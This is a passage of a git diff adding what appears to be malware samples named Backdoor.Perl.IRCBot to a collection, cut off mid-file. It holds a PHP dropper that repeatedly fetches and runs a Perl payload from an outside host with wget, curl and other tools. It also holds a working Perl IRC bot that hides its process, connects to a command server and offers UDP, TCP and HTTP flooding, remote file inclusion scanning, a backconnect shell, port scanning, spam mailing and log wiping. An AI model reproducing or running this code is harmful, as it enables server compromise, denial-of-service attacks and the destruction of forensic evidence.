$dork =~ s/ /\+/g; + $dork =~ s/:/\%3A/g; + $dork =~ s/\//\%2F/g; + $dork =~ s/&/\%26/g; + $dork =~ s/\"/\%22/g; + $dork =~ s/,/\%2C/g; + $dork =~ s/\\/\%5C/g; + return $dork; +} + +sub end() { + $string = $_[0]; + $string .= "/"; + $string =~ s/\/\//\//; + while ( $string =~ /\/\// ) { + $string =~ s/\/\//\//; + } + return ($string); +} + +sub query($) { + my $url = $_[0]; + $url =~ s/http:\/\///; + my $host = $url; + my $query = $url; + my $page = ""; + $host =~ s/href=\"?http:\/\///; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $query =~ s/$host//; + if ( $query eq "" ) { $query = "/"; } + eval { + my $sock = IO::Socket::INET->new( + PeerAddr => "$host", + PeerPort => "80", + Proto => "tcp" + ) or return; + print $sock +"GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$sock>; + $page = "@r"; + close($sock); + }; + return $page; +} + +sub get_link() { + my $file_print = $_[1]; + my $link = $_[0]; + my $host = $_[0]; + my $host_dir = $_[0]; + my @links; + $host_dir =~ s/(.*)\/[^\/]*$/\1/; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $host_dir = &end($host_dir); + $host = &end($host); + $link = &end($host); + push( @links, $link, $host, $host_dir ); + open( $file, '>>', $file_print ); + print $file "$link\n$host_dir\n$host\n"; + close($file); + return @links; +} + +sub unici { + my @unici = (); + my %visti = (); + foreach my $elemento (@_) { + $elemento =~ s/\/+/\//g; + next if $visti{$elemento}++; + push @unici, $elemento; + } + return @unici; +} + + + + + diff --git a/Perl/Backdoor.Perl.IRCBot.p b/Perl/Backdoor.Perl.IRCBot.p new file mode 100644 index 00000000..51262542 --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.p @@ -0,0 +1,119 @@ +<? +$dir = @getcwd(); +echo "Mic22<br>"; +$OS = @PHP_OS; +echo "OSTYPE:$OS<br>"; +$free = disk_free_space($dir); +shell_exec('cd /tmp; wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp; wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +system('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +passthru('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt'); +shell_exec('cd /tmp;rm -rf 21.txt*'); +system('cd /tmp;rm -rf 21.txt**'); +passthru('cd /tmp;rm -rf 21.txt**'); +shell_exec('cd /tmp;rm -rf 21.txt**'); +system('cd /tmp;rm -rf 21.txt**'); +passthru('cd /tmp;rm -rf 21.txt**'); +shell_exec('cd /tmp;rm -rf 21.txt*'); +system('cd /tmp;rm -rf 21.txt**'); +passthru('cd /tmp;rm -rf 21.txt**'); +shell_exec('cd /tmp;rm -rf 21.txt**'); +system('cd /tmp;rm -rf 21.txt**'); +passthru('cd /tmp;rm -rf 21.txt**'); + +if ($free === FALSE) {$free = 0;} + +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."<br>"; + +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; + +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} + +function view_size($size) + +{ + + if (!is_numeric($size)) {return FALSE;} + + else + + { + + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + + else {$size = $size . " B";} + + return $size; + + } + +} + +exit; diff --git a/Perl/Backdoor.Perl.IRCBot.r b/Perl/Backdoor.Perl.IRCBot.r new file mode 100644 index 00000000..a2c8b252 --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.r @@ -0,0 +1,1333 @@ +# +# + Improved Scanner +# + Improved Configuration +# + Nmap PortScan +# + LogCleaner +# + Mailer +# +#You can use the following commands : +# +# +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### + +###################### +use HTTP::Request; +use LWP::UserAgent; +###################### +my $processo = '[httpds]'; +###################### +##################################################################### +#/!\ .:CONFIGURATION:. /!\# +##################################################################### +############################################ +my $linas_max='8'; +#----------------- # +# Maximum Lines for Anti Flood # +############################################# +my $sleep='5'; +#----------------- # +#Sleep Time # +############################################ +my $cmd="http://renewable-energy-news.com/cool.gif"; +#----------------- # +#CMD that is printed in the channel # +############################################ +my $id="http://gundam-gundam.net/derf"; +#----------------- # +#ID = Response CMD # +############################################ +my @adms=("putr4","emping","nob0dy"); +#----------------- # +#Admins of the Bot set your nickname here # +############################################ +my @canais=("#test"); +#----------------- # +#Put your channel here # +############################################ +my @nickname = ("sial|"); +my $nick = $nickname[rand scalar @nickname]; +#----------------- # +#Nickname of bot # +############################################ +my $ircname ='fuck'; +chop (my $realname = '-=[!]putr4[!]=-'); +#----------------- # +#IRC name and Realname # +############################################ +$servidor='irc.mildnet.cn' unless $servidor; +my $porta='6667'; +#----------------- # +#IRCServer and port # +############################################ +##################################################################### +#/!\ .:CONFIGURATION:. /!\# +##################################################################### +###################### +#End of Configuration# +# # +###################### +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### + +#Connect +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Masalah fork: $!" unless defined($pid); + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", + PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} + +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + for(my $c=0; $c<= $#lines; $c++) { + + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.31 putr4\001"); + } + if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + +#End of Connect + +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### + +###################### +# PREFIX # +# # +###################### +# You can change the prefix if you want but the commands will be different +# The standard prefix is !bot if you change it into !bitch for example +# every command will be like !bitch @udpflood, !bitch @googlescan. +# So its recommended not to change this ;) +###################### + + if ($args =~ /^(\Q$meunick\E|\!hajar)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } +} +} +###################### +# End of PREFIX # +# # +###################### + +elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { +if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +} +} elsif ($servarg =~ m/^\:(.+?)\s+433/i) { +nick("$meunick".int rand(999999)); +} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { +$meunick = $2; +$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +$irc_servers{$IRC_cur_socket}{'nome'} = "$1"; +foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); +} +} +} + +sub bfunc { +my $printl = $_[0]; +my $funcarg = $_[1]; +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { + exit; +} else { + +###################### +# Help # +# # +###################### + +if ($funcarg =~ /^help/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Select the function you want help for"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@ddos"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@rfiscan"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@backconnect"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@shell"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscanner"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Or if you want too know all the commands type:"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@commands"); + +} + +if ($funcarg =~ /^ddos/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 There are 3 DDossers in this bot"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 UDPFlood, HTTPFlood and TCPFlood"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@udpflood <ip> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@tcpflood <ip> <port> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@httpflood <site> <time>"); + +} + +if ($funcarg =~ /^rfiscan/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 This bot also contains a RFI Scanner."); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 That contains the engines :12G4o8o12g9l4e4, 7M4S7N4, 7All7The7Web4, 14A4S14K4, 7AOL, 1L7yc1o7s4, 13Y6ahoo "); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Commands :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@rfi <vuln> <dork>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can find strings here : http://www.xshqiptaretx.org/strings.txt "); + +} + +if ($funcarg =~ /^backconnect/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You use backconnect like this :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@back <ip><port>"); +} + +if ($funcarg =~ /^shell/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 This bot has a integrated shell"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can use it in private but also public in the channel"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 In public channel just use : 7!bot cd tmp12 for example"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 For help with the linux commands type :!bot 7@linuxhelp"); +} + +if ($funcarg =~ /^portscanner/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 There is a normal portscan and a Nmap:"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscan <ip>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@nmap <ip> <beginport> <endport>"); +} + +if ($funcarg =~ /^commands/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can use the following commands :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscan <ip>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@nmap <ip> <beginport> <endport>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@back <ip><port>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot cd tmp 12 for example"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@udpflood <ip> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@tcpflood <ip> <port> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@httpflood <site> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@linuxhelp"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@rfi <vuln> <dork>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@system"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@hapus"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@sendmail <subject> <sender> <recipient> <message>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@milw0rm"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@join #channel"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@part #channel"); +} + +if ($funcarg =~ /^linuxhelp/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Dir where you are : pwd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Start a Perl file : perl file.pl"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Go back from dir : cd .."); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Force to Remove a file/dir : rm -rf file/dir;ls -la"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Show all files/dir with permissions : ls -lia"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find config.inc.php files : find / -type f -name config.inc.php"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all writable folders and files : find / -perm -2 -ls"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all .htpasswd files : find / -type f -name .htpasswd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all service.pwd files : find / -type f -name service.pwd"); +} + +###################### +# End of Help # +# # +###################### + +###################### +# Commands # +# # +###################### + +if ($funcarg =~ /^system/) { +$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`; + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Info BOT : 7 Servidor :Hiden : 6667"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Uname -a : 7 $uname"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Uptime : 7 $uptime"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Own Prosses : 7 $processo"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12ID : 7 $id"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Own Dir : 7 $ownd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12OS : 7 $distro"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Owner : 7 someone"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Channel : 7 secret"); +} + +if ($funcarg =~ /^milw0rm/) { + my @ltt=(); + my @bug=(); + my $x; + my $page=""; + my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return; + print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$socke>; + $page="@r"; + close($socke); + while ($page =~ m/<title>(.*)</g){ + $x = $1; + if ($x =~ /\<\;/) { + $x =~ s/\<\;/</g; + } + if ($x !~ /milw0rm/) { + push (@bug,$x); + }} + while ($page =~ m/<link.*expl.*([0-9]...)</g) { + if ($1 !~ m/milw0rm.com|exploits|en/){ + push (@ltt,"http://www.milw0rm.com/exploits/$1 "); + }} + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:9milw0rm12:.4|12 Latest exploits :"); + foreach $x (0..(@ltt - 1)) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:9milw0rm12:.4|12 $bug[$x] - $ltt[$x]"); + sleep 1; +}} +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### +###################### +# Portscan # +# # +###################### + +if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my + @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 Scanning for open ports on  4".$1." 12 started ."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => + 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 Open ports founded: @aberta"); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 No open ports foundend."); + } +} + +###################### +# End of Portscan # +# # +###################### +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | ||| || |_/\| |_/|| | \||| /_ | | # +# \_/ \|\_/\____/\____/\_/ \|\____\ \_/ # +# someone???Production # +################################################################################### +###################### +# Nmap # +# # +###################### + if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){ + my $hostip="$1"; + my $portstart = "$2"; + my $portend = "$3"; + my (@abertas, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Nmap PortScan12:.4| 4: $1 12.:4Ports12:. 4 $2-$3"); + foreach my $porta ($portstart..$portend){ + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); + if ($scansock) { + push (@abertas, $porta); + $scansock->close; + if ($xstats){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Nmap PortScan12:.4| 12Founded 4 $porta"."/Open"); + } + } + } + if (@abertas) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Nmap PortScan12:.4| Complete "); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Nmap PortScan12:.4| No open ports have been founded 13"); + } + } +###################### +# End of Nmap # +# # +###################### +# +# someone +# +###################### +# Log Cleaner # +# # +###################### +if ($funcarg =~ /^hapus/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LogCleaner12:.4|12 This process can be long, just wait"); + system 'rm -rf /var/log/lastlog'; + system 'rm -rf /var/log/wtmp'; + system 'rm -rf /etc/wtmp'; + system 'rm -rf /var/run/utmp'; + system 'rm -rf /etc/utmp'; + system 'rm -rf /var/log'; + system 'rm -rf /var/logs'; + system 'rm -rf /var/adm'; + system 'rm -rf /var/apache/log'; + system 'rm -rf /var/apache/logs'; + system 'rm -rf /usr/local/apache/log'; + system 'rm -rf /usr/local/apache/logs'; + system 'rm -rf /root/.bash_history'; + system 'rm -rf /root/.ksh_history'; +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LogCleaner12:.4|12 All default log and bash_history files erased"); + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LogCleaner12:.4|12 Now Erasing the rest of the machine log files"); + system 'find / -name *.bash_history -exec rm -rf {} \;'; + system 'find / -name *.bash_logout -exec rm -rf {} \;'; + system 'find / -name "log*" -exec rm -rf {} \;'; + system 'find / -name *.log -exec rm -rf {} \;'; + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LogCleaner12:.4|12 Done! All logs erased"); + } +###################### +# End of Log Cleaner # +# # +###################### +# +# someone +# +###################### +# MAILER # +# # +###################### +# For mailing use : +# !bot @sendmail <subject> <sender> <recipient> <message> +# +###################### +if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Mailer12:.4|12 Sending Mail to :2 $3"); +$subject = $1; +$sender = $2; +$recipient = $3; +@corpo = $4; +$mailtype = "content-type: text/html"; +$sendmail = '/usr/sbin/sendmail'; +open (SENDMAIL, "| $sendmail -t"); +print SENDMAIL "$mailtype\n"; +print SENDMAIL "Subject: $subject\n"; +print SENDMAIL "From: $sender\n"; +print SENDMAIL "To: $recipient\n\n"; +print SENDMAIL "@corpo\n\n"; +close (SENDMAIL); +sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Mailer12:.4|12 Mail Sended To :2 $recipient"); +} +###################### +# End of MAILER # +# # +###################### +###################### +# Join And Part # +# # +###################### + if ($funcarg =~ /^join (.*)/) { + sendraw($IRC_cur_socket, "JOIN ".$1); + } + if ($funcarg =~ /^part (.*)/) { + sendraw($IRC_cur_socket, "PART ".$1); + } + +###################### +#End of Join And Part# +# # +###################### +################################################################################### +# _ _ _ ____ _ _____ _____ # +# / \__/|/ \/ \ / _ \/ \ /|/ __//__ __\ # +# | |\/||| || | | | \|| |\ ||| \ / \ # +# | | 